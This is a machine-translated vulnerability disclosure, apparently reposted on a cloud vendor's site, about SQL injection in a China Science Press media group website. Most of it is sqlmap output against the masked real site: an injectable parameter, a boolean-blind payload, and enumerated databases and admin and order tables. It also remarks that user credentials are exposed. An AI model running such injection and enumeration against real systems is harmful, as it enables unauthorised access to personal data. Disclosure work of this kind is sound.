SQL Injection in a media group of China Science Press

Last Update:2015-12-22 Source: Internet

Author: User

Tags sybase

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

SQL Injection in a media group of China Science Press

Good security ,,,,

Detailed description:

Root @ attack :~ # Sqlmap-u "http: // **. **/s_second.php? Id = 28"

_

___ | _____ ___ {1.0-dev-nongit-20150918}

| _-|. |. '|. |

| ___ | _ |__, | _ |

| _ | Http ://**.**.**.**

[!] Legal disclagal: Usage of sqlmap for attacking targets without prior mutual consent is illegal. it is the end user's responsibility to obey all applicable local, state and federal laws. developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] Starting at 18:58:47

[18:58:48] [INFO] testing connection to the target URL

[18:58:51] [INFO] heuristics detected web page charset 'gb2312'

[18:58:54] [WARNING] reflective value (s) found and filtering out

[18:58:55] [INFO] testing if the target URL is stable

[18:58:59] [INFO] target URL is stable

[18:58:59] [INFO] testing if GET parameter 'id' is dynamic

[18:58:59] [INFO] confirming that GET parameter 'id' is dynamic

[18:58:59] [WARNING] GET parameter 'id' does not appear dynamic

[18:58:59] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable

[18:58:59] [INFO] testing for SQL injection on GET parameter 'id'

[18:59:00] [INFO] testing 'AND boolean-based blind-WHERE or HAVING clause'

[18:59:07] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind-WHERE or HAVING clause 'injectable

[18:59:07] [INFO] testing 'mysql> = 5.0 AND error-based-WHERE, HAVING, order by or group by clause'

[18:59:07] [INFO] testing 'postgresql AND error-based-WHERE or HAVING clause'

[18:59:07] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based-WHERE or HAVING Claus'

[18:59:07] [INFO] testing 'oracle AND error-based-WHERE or HAVING clause (XMLType )'

[18:59:07] [INFO] testing 'mysql> = 5.0 error-based-Parameter replace'

[18:59:14] [INFO] heuristics detected web page charset 'iso-8859-2'

[18:59:16] [INFO] testing 'mysql inline querys'

[19:00:09] [WARNING] there is a possibility that the target (or WAF) is dropping 'suspicmy' requests

[19:00:09] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request

[19:00:23] [INFO] testing 'postgresql inline querys'

[19:00:33] [INFO] testing 'Microsoft SQL Server/Sybase inline querys'

[19:00:41] [INFO] testing 'mysql> 5.0.11 stacked queries (SELECT-comment )'

[19:00:41] [WARNING] time-based comparison requires larger statistical model, please wait ............

[19:01:25] [CRITICAL] considerable lagging has been detected in connection response (s). Please use as high value for option '-- time-sec' as possible (e.g. 10 or more)

[19:01:28] [INFO] testing 'postgresql> 8.1 stacked queries (comment )'

[19:01:31] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment )'

[19:01:35] [INFO] testing 'oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE-comment )'

[19:01:35] [INFO] testing 'mysql> = 5.0.12 AND time-based blind (SELECT )'

[19:01:40] [INFO] testing 'postgresql> 8.1 AND time-based blind'

[19:01:40] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'

[19:01:46] [INFO] testing 'oracle AND time-based blind'

[19:01:47] [INFO] testing 'generic UNION query (NULL)-1 to 20 columns'

[19:01:47] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '-- dbms'

[19:01:47] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found

[19:02:34] [INFO] testing 'mysql UNION query (NULL)-1 to 20 columns'

[19:03:06] [INFO] checking if the injection point on GET parameter 'id' is a false positive

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any )? [Y/N]

Sqlmap identified the following injection point (s) with a total of 82 HTTP (s) requests:

---

Parameter: id (GET)

Type: boolean-based blind

Title: AND boolean-based blind-WHERE or HAVING clause

Payload: id = 28 AND 2130 = 2130

---

[19:04:10] [INFO] testing MySQL

[19:04:13] [INFO] confirming MySQL

[19:04:20] [INFO] the back-end DBMS is MySQL

Web application technology: PHP 5.3.3, Apache

Back-end DBMS: MySQL> = 5.0.0

[19:04:20] [INFO] fetched data logged to text files under '/root/. sqlmap/output /**.**.**.**'

------------------------------------------------------------------

Available databases [3]:

[*] Information_schema

[*] Sciencep_db

[*] Test

[19:18:46] [INFO] fetched data logged to text files under '/root/. sqlmap/output /**.**.**.**'

-----------------------

Three databases

----------------------

[21:32:47] [INFO] the back-end DBMS is MySQL

Web application technology: PHP 5.3.3, Apache

Back-end DBMS: MySQL 5

[21:32:47] [INFO] fetching tables for database: 'sciencep _ db'

[21:32:47] [INFO] fetching number of tables for database 'sciencep _ db'

[21:32:47] [INFO] resumed: 158

[21:32:47] [INFO] resumed: 1 discountrate

[21:32:47] [INFO] resumed: 2 order

[21:32:47] [INFO] resumed: 3 orderdetail

[21:32:47] [INFO] resumed: admininfo

[21:32:47] [INFO] resumed: article_t

[21:32:47] [INFO] resumed: ci_sessions

[21:32:47] [INFO] resumed: classification

[21:32:47] [INFO] resumed: column_t

[21:32:47] [INFO] resumed: daorushujibiao

[21:32:47] [INFO] resumed: department

[21:32:47] [INFO] resumed: group_list

[21:32:47] [INFO] resumed: hxhd_addon15

[21:32:47] [INFO] resumed: hxhd_addonarticle

[21:32:47] [INFO] resumed: hxhd_addonflash

[21:32:47] [INFO] resumed: hxhd_addonimages

[21:32:47] [INFO] resumed: hxhd_addonsoft

[21:32:47] [INFO] resumed: hxhd_addonspec

[21:32:47] [INFO] resumed: hxhd_admin

[21:32:47] [INFO] resumed: hxhd_admintype

[21:32:47] [INFO] resuming partial value: hxhd_a

[21:32:47] [WARNING] running in a single-thread mode. Please consider usage of option '-- Threads' for faster data retrieval

[21:32:47] [INFO] retrieved:

[21:33:30] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request

Rc

[21:35:00] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request

Att

[21:37:11] [INFO] retrieved: hxhd _

-------------------------------------------------

There are 158 tables in the current database, and there should be a lot of leaks. I will not run them one by one.

----------------------------------------------

You can purchase the phone number from the website. The leaked mobile phone number should include the user account and password.

-----------------------------------------------------

Hope that the publishing house will send a book (C Language Programming Tutorial (second edition ))

Proof of vulnerability:

Solution:

Filter

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More